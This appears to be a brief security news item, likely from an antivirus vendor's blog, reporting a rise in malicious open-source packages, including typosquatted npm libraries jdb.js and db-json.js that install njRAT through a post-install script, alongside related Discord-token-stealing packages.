According to a report put together by researchers, there has been a steady rise in malicious code injection within open-source software (OSS) projects. As per the report, it has been a 430% rise. Two malicious packages have been used by cybercriminals in recent times that are dubbed as jdb.js and db-json.js to deliver njRAT aka Bladabindi malware.
These two malicious packages discovered by researchers contain a malicious script that gets executed after any of the two virulent libraries are imported and installed by web developers.
- Both packages described themselves as tools to help developers work with JSON files typically generated by database applications.
- The legitimacy of the NodeJS-based database library – jdb is mimicked by the jdb.js while the db-json.js package carries an identical name to the genuine db-json library.
- A file named patch.exe then further installs the njRAT after the post-install script of jdb.js attempts to downloads and runs it.
- More than 100 downloads of these packages from the NPM package registry has been observed by researchers.
Sever other malware components that have already made headlines are discord.dll, discord.app, wsbd.js, ac-addon, and more.
- The CursedGrabber campaign that was recently executed was associated with xpc.js malware that was stealing Discord tokens and sensitive user data by targeting Windows hosts.
- Researchers had discovered two NPM packages, discord.dll, and twilio-npm, that have also been stealing sensitive files from Discord applications and browsers.
The NPM team has released a security advisory for these malicious code. However, if adequate protections are not in place there could be a possible emergence of counterfeit components suggesting an occurrence of next-gen software supply chain attacks.
To read more, please check eScan Blog
